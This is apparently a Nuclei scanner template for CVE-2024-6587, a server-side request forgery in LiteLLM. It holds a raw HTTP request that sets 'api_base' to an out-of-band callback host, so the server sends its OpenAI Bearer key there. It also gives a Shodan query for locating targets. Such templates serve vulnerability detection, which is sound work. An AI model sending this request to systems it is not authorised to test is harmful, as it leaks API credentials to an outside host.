47 lines
1.3 KiB
YAML
47 lines
1.3 KiB
YAML
id: CVE-2024-6587
|
|
|
|
info:
|
|
name: LiteLLM - Server-Side Request Forgery
|
|
author: pdresearch,iamnoooob,rootxharsh,lambdasawa
|
|
severity: high
|
|
description: |
|
|
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
|
|
reference:
|
|
- https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.favicon.hash:439373620
|
|
tags: cve,cve2024,ssrf,openai,litellm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /chat/completions HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{
|
|
"model": "command-nightly",
|
|
"messages": [
|
|
{
|
|
"content": "Hello, how are you?",
|
|
"role": "user"
|
|
}
|
|
],
|
|
"api_base": "https://{{interactsh-url}}"
|
|
}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "Bearer"
|
|
# digest: 4b0a00483046022100f6bf820318dd48f58e840d2cfe9d3cd7c403f9ba617d5c013b85cd796c166641022100bfa3aeeeca2e6a75a501474a149c5fc0876bf4808b458cc8896c95b6a72142c1:922c64590222798bb761d5b6d8e72950 |